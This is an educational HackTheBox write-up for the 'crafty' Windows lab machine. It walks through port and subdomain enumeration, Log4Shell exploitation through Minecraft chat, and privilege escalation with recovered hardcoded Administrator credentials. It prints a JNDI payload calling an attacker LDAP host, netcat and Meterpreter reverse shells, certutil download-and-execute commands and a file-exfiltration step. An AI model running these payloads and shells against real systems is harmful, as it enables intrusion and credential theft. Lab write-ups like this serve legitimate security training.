HTB: crafty Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐☆☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

crafty is an Easy-difficulty Windows machine featuring a Microsoft IIS 10.0 web server and a vulnerable Minecraft 1.16.5 server. The attack leverages CVE-2021-44228 (Log4Shell) for initial code execution. The exploitation path involves reconnaissance through port scanning and subdomain enumeration, gaining an initial foothold via Log4j RCE on the Minecraft server, extracting hardcoded credentials from a compiled plugin, and finally achieving privilege escalation to Administrator through credential reuse.

TL;DR: Port enumeration → Subdomain discovery → Log4Shell RCE → Plugin extraction → Credential discovery → Privilege escalation to Administrator.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.219.158

Results:

80/tcp    open  http       Microsoft-IIS/10.0
25565/tcp open  minecraft  Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server)

Directory & Subdomain Enumeration

Web directories (gobuster):

gobuster dir -u http://crafty.htb -w /usr/share/wordlists/common.txt

Discovered directories: /home, /img, /css, /js, /coming-soon

Subdomain enumeration (ffuf):

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://crafty.htb -H "Host: FUZZ.crafty.htb" -fs 11564

Discovered subdomain: play.crafty.htb

Service Enumeration

Hostname: crafty.htb

Add to /etc/hosts:

echo "10.129.219.158 crafty.htb" >> /etc/hosts
echo "10.129.219.158 play.crafty.htb" >> /etc/hosts

Vulnerability Assessment

Identified Vulnerabilities:

• CVE-2021-44228 (Log4Shell) — Minecraft 1.16.5 is vulnerable to Log4j Remote Code Execution through JNDI injection in chat messages.

Initial Foothold

Log4Shell RCE (CVE-2021-44228)

Minecraft 1.16.5 is vulnerable to Log4j JNDI injection. The vulnerability allows remote code execution by sending a crafted message to the Minecraft server chat.

Step 1: Clone and Setup log4j-shell-poc

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc

Step 2: Generate the JNDI Payload

python3 poc.py --userip 10.10.14.105 --webport 25565 --lport 9001

This generates the JNDI payload in the format:

${jndi:ldap://10.10.14.105:1389/a}

The script automatically sets up the LDAP and HTTP servers for exploitation.

Step 3: Start Netcat Listener

nc -lvnp 9001

Step 4: Connect to Minecraft Server and Send Payload

Connect to the Minecraft server using TLauncher or PyCraft:

python3 client.py --address crafty.htb --port 25565 --username attacker

In the chat, send the JNDI payload:

${jndi:ldap://10.10.14.105:1389/a}

Step 5: Receive Shell

Once the payload is processed by the server, the netcat listener will receive a reverse shell as the svc_minecraft user:

Listening on [0.0.0.0] 9001 ...
Connection received on [10.129.219.158] 52341
Microsoft Windows [Version 10.0.17763.2928]
C:\Users\svc_minecraft\server>

User Compromise

Initial Shell Upgrade to Meterpreter

The initial netcat shell is basic and unstable. Upgrade to Meterpreter for better stability and features.

Step 1: Generate Meterpreter Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=4444 -f exe -o s1.exe

Step 2: Start HTTP Server and Metasploit Handler

On attacker machine, start HTTP server:

python3 -m http.server 8000

Start Metasploit multi/handler:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.105
set LPORT 4444
exploit

Step 3: Download and Execute Payload

From the svc_minecraft shell:

certutil -urlcache -f http://10.10.14.105:8000/s1.exe s1.exe
.\s1.exe

You will receive a Meterpreter session as svc_minecraft.

User Flag

cat C:\Users\svc_minecraft\Desktop\user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

whoami
whoami /priv
net user
systeminfo

Output shows we are running as svc_minecraft user.

Plugin Extraction and Decompilation

The Minecraft server stores a plugin JAR file at:

C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar

Step 1: Exfiltrate the JAR File

Using PowerShell to encode the JAR as base64:

$FileName = "C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName))
echo $base64string

Copy the base64 output and decode it on the attacker machine:

echo "<base64_string>" | base64 -d > plugin.jar

Step 2: Decompile the JAR

Using jd-gui to decompile the JAR file:

jd-gui plugin.jar

Search through the decompiled code to find hardcoded credentials. In the plugin code, you’ll find:

Administrator:s67u84zKq8IXw

Privilege Escalation via RunasCs

Step 1: Download RunasCs.exe

Download RunasCs.exe (a Windows RunAs alternative that works better with reverse shells).

Step 2: Generate Second Meterpreter Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=4445 -f exe -o s2.exe

Step 3: Execute Payload as Administrator

Upload both RunasCs.exe and s2.exe to the target machine via HTTP:

certutil -urlcache -f http://10.10.14.105:8000/RunasCs.exe RunasCs.exe
certutil -urlcache -f http://10.10.14.105:8000/s2.exe s2.exe

Execute the second payload as Administrator:

.\RunasCs.exe "Administrator" "s67u84zKq8IXw" "s2.exe"

Step 4: Receive Administrator Shell

Set up Metasploit handler for port 4445:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.105
set LPORT 4445
exploit

You will receive a Meterpreter session as Administrator.

Root Flag

type C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scanning<br/>(nmap)"] --> B["Discover Port 25565<br/>(Minecraft 1.16.5)"]
    B --> C["Subdomain Enumeration<br/>(ffuf: play.crafty.htb)"]
    C --> D["Log4Shell RCE<br/>(CVE-2021-44228)"]
    D --> E["Initial Shell<br/>(svc_minecraft)"]
    E --> F["Upgrade to Meterpreter<br/>(certutil + msfvenom)"]
    F --> G["Extract Plugin JAR<br/>(PlayCounter)"]
    G --> H["Decompile with jd-gui<br/>(Find Credentials)"]
    H --> I["Discover Admin Creds<br/>(Administrator:s67u84zKq8IXw)"]
    I --> J["RunasCs.exe Execution<br/>(Second Meterpreter)"]
    J --> K["Administrator Shell<br/>(Full Compromise)"]

    style A fill:#ff7f50
    style E fill:#87ceeb
    style K fill:#32cd32

Tools Used

Vulnerability Reference

Key Learnings

1. Service Version Enumeration is Critical: Identify all running services and their versions. Minecraft 1.16.5 is vulnerable to Log4Shell, a critical RCE vulnerability that affects many services using Apache Log4j.

2. Game Servers as Attack Vectors: Multiplayer game servers like Minecraft are often overlooked but can provide direct code execution paths through chat message processing.

3. JNDI Injection Exploitation: The Log4Shell vulnerability exploits JNDI (Java Naming and Directory Interface) to achieve RCE. Understanding how log libraries process untrusted input is crucial.

4. Plugin/Mod Code Analysis: Extracting and decompiling application plugins can reveal hardcoded credentials. Never hardcode sensitive information in compiled code.

5. Credential Reuse: Administrative credentials hardcoded in plugins enable privilege escalation through RunasCs.exe or similar tools. Always assume credentials found in one context may grant access at higher privilege levels.

6. Shell Upgrade Strategy: Initial shells (netcat) should be upgraded to more powerful frameworks (Meterpreter) for stability and additional capabilities needed for post-exploitation.

7. Multi-Stage Exploitation: Complex targets often require multiple payload stages and different attack techniques. First compromise gets a foothold, plugin analysis gets credentials, and RunasCs executes the final payload as admin.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Easy #CVE-2021-44228